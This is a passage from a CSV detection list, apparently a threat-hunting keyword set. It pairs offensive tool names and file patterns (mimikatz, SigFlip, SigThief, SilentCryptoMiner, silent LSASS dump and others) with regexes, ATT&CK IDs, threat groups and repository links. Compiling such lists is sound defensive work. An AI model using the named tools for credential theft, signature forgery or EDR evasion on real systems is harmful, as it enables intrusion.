"*sid::modify*",".{0,1000}sid\:\:modify.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::patch*",".{0,1000}sid\:\:patch.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sid::query*",".{0,1000}sid\:\:query.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sigflip*/Bof/*",".{0,1000}sigflip.{0,1000}\/Bof\/.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigFlip.exe -*",".{0,1000}SigFlip\.exe\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigFlip.WinTrustData*",".{0,1000}SigFlip\.WinTrustData.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigInject *",".{0,1000}SigInject\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigInject *.dll*",".{0,1000}SigInject\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigLoader *",".{0,1000}SigLoader\s.{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*Sigloader *.dll*",".{0,1000}Sigloader\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigLoader.*",".{0,1000}SigLoader\..{0,1000}","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*SigLoader/sigloader.c*",".{0,1000}SigLoader\/sigloader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*signal2john.py*",".{0,1000}signal2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Signal-Labs/NtdllUnpatcher*",".{0,1000}Signal\-Labs\/NtdllUnpatcher.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*SignToolEx.exe*",".{0,1000}SignToolEx\.exe.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*SignToolExHook.dll*",".{0,1000}SignToolExHook\.dll.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","1","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*SignToolEx-main*",".{0,1000}SignToolEx\-main.{0,1000}","offensive_tool_keyword","SignToolEx","Patching signtool.exe to accept expired certificates for code-signing","T1553.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/hackerhouse-opensource/SignToolEx","1","0","N/A","8","3","253","39","2023-12-29T15:08:41Z","2023-12-29T14:26:45Z" "*SigPloit*",".{0,1000}SigPloit.{0,1000}","offensive_tool_keyword","SigPloit","SigPloit a signaling security testing framework dedicated to Telecom Security professionals and reasearchers to pentest and exploit vulnerabilites in the signaling protocols used in mobile operators regardless of the geneartion being in use. SigPloit aims to cover all used protocols used in the operators interconnects SS7. GTP (3G). Diameter (4G) or even SIP for IMS and VoLTE infrastructures used in the access layer and SS7 message encapsulation into SIP-T. Recommendations for each vulnerability will be provided to guide the tester and the operator the steps that should be done to enhance their security posture","T1573 - T1562 - T1189 - T1190 - T1201","TA0002 - TA0003 - TA0007 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/SigPloiter/SigPloit","1","1","N/A","N/A","1","40","13","2019-12-17T16:51:23Z","2017-03-30T03:46:03Z" "*sigthief.exe.manifest*",".{0,1000}sigthief\.exe\.manifest.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*SigThief.py*",".{0,1000}SigThief\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*Sigthief.py*",".{0,1000}Sigthief\.py.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*sigthief.py*",".{0,1000}sigthief\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*SigThief-master*",".{0,1000}SigThief\-master.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*sigwhatever.exe*",".{0,1000}sigwhatever\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SilenceDefender.ps1*",".{0,1000}SilenceDefender\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*SilenceDefender_ATP.log*",".{0,1000}SilenceDefender_ATP\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*SilenceDefender_ATP.ps1*",".{0,1000}SilenceDefender_ATP\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Silent Crypto Miner Builder*",".{0,1000}Silent\sCrypto\sMiner\sBuilder.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*Silent Lsass Dump*",".{0,1000}Silent\sLsass\sDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*Silent.Crypto.Miner.Builder.zip*",".{0,1000}Silent\.Crypto\.Miner\.Builder\.zip.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*silentbreaksec/Throwback*",".{0,1000}silentbreaksec\/Throwback.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","1","N/A","10","10","304","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z" "*SilentCryptoMiner.sln*",".{0,1000}SilentCryptoMiner\.sln.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*SilentCryptoMiner-scm-v*",".{0,1000}SilentCryptoMiner\-scm\-v.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","1","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*silenthound.py*",".{0,1000}silenthound\.py.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*silenthound_enum*",".{0,1000}silenthound_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*silenthound_output_*.txt*",".{0,1000}silenthound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*SilentHound-main*",".{0,1000}SilentHound\-main.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","1","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*silentLsassDump*",".{0,1000}silentLsassDump.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 